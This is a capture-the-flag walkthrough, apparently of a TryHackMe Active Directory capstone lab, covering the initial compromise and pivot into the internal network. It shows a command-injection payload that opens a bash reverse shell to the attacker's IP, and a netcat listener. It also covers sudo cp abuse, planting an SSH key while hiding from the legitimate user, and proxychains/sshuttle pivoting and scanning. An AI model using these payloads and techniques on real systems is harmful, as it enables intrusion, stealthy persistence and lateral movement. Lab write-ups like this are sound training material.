Initial Compromise of Active Directory
Target VPN 10.200.XXX.12
Used Tools
nc
GTFOBins
cp
SSH
ProxyChains
sshuttle
Remmina
Summary
Due to the fact that we only have access to the WRK machines and by submitting the flags revealing the child domain controller corpdc and server1 and server2, we have to use another method than a limited OpenVPN connection to pivot through the network. We'll find a vulnerability in the submit panel to create an OpenVPN file. It's vulnerable to code execution, which enables us a reverse shell to our attack machine. From there, enumerating the target, we see www-data user is allowed to use cp with sudo. Maybe for the OpenVPN file creation process. From there, we are able to read and add our ssh public key to the .ssh/authorized_keys of the user Ubuntu. Which enables us a stable ssh connection. With the ssh connection established, we use dynamic port forwarding to reach the internal network. Next, a more stable solution with the ability to analyze the connection with is approached using sshuttle. From there we are able to reach the first five machines. And submit Flag 2 and 3. Which would also be possible within the perimeter breach.
Investigation
On inspecting the submit form for usernames we see that it is possible to chain commands via && using sleep 10 the site takes 10 seconds to load and gives us the OpenVPN file for x.
Next, we start a listener via netcat on 4445.
nc -lnvp 4445
And prepare the following payload to connect back to our machine.
x && /bin/bash -i >& /dev/tcp/10.50.99.21/4445 0>&1
Submitting the payload gives us a reverse shell of user www-data.
Before we move on, we upgrade the shell to not accidentally escape out of it.
Upgrade the shell:
https://0xffsec.com/handbook/shells/full-tty/
SHELL=/bin/bash script -q /dev/null
STRG Z
stty raw -echo && fg
Enumerating the target reveals to us, that the user www-data is allowed to use cp with sudo.
The next step is to move to GTFOBins and see if it is possible to abuse this.
https://gtfobins.github.io/gtfobins/cp/
With the following command, we are able to write to any file.
And with command, we are able to read any file.
Next, we look for any users on the machine and there is ubuntu.
Looking at the home directory of Ubuntu, we are able to read it and there is a .ssh folder.
The idea is to add our own public SSH key to .ssh/authorized_keys to SSH into Ubuntu.
This is our own key for this purpose.
Modify the following command to append your public key to the .ssh/authorized_keys
Before we move on, we get the other keys of other participants and users from the authorized_keys to append our key to the authorized_key file to avoid breaking the persistence of other users of the network and remain undetected for the general user Ubuntu which might still want to SSH into his machine.
Before modifying check if the file exists and its current content
Append the SSH public key to .ssh/authorized_keys
Just add the key with the following command, it is the same but does not contain the existing keys.
After adding our key to the authorized_keys file, we can SSH into the machine as user ubuntu.
Enumerating the target reveals to us that this user is allowed to run anything without providing a password with sudo.
Next, we check from the VPN machine every other reachable target from there excluding 10.200.103.250. This time Host .22 is missing but there is .31
With the ability to connect via SSH, we want to pivot through the network using SSH dynamic port forwarding. For this, we use
ssh -D <PORT> to redirect everything to port 9050
ssh -D 9050 -i capstone-vpn-id ubuntu@10.200.103.12
From there, we enumerate the network excluding the e-citizen machine using ProxyChains to reach our connection established via ssh-D. Now we just look for machines that have the RDP port open, in the hope to find anything. Simply scanning for available targets - using ProxyChains - results in 255 reachable machines, which is not correct to the network diagram provided by the challenge.
proxychains -q nmap -sT -Pn -p 3389 10.200.103.0/24 --exclude 10.200.103.250 --open
For further investigations, especially for the next part of fully compromising the corp domain we use sshuttle to pivot through the network to not have to use ProxyChains.
sshuttle --dns -vr [ubuntu@10.200.103.12](mailto:ubuntu@10.200.119.12) 10.200.103.0/24 -x 10.200.103.12 --ssh-cmd 'ssh -i /home/0xb0b/Documents/tryhackme/capstone/capstone-vpn-id'
To test the ability to pivot through the network with sshuttle Nmap was used to scan a known port of a known machine.
nmap -p 3389 10.200.103.31 -Pn -v
Now reusing the credentials of laura.wood to conncect on machine WRK1.
Again we are able to connect to the machine via RDP and retrieve the next two flags.
Flag-2: Breaching Active Directory
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt
Flag-3: Foothold on Corporate Division Tier 2 Infrastructure
echo XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX > C:\Windows\Temp\0xb0b.txt
Last updated
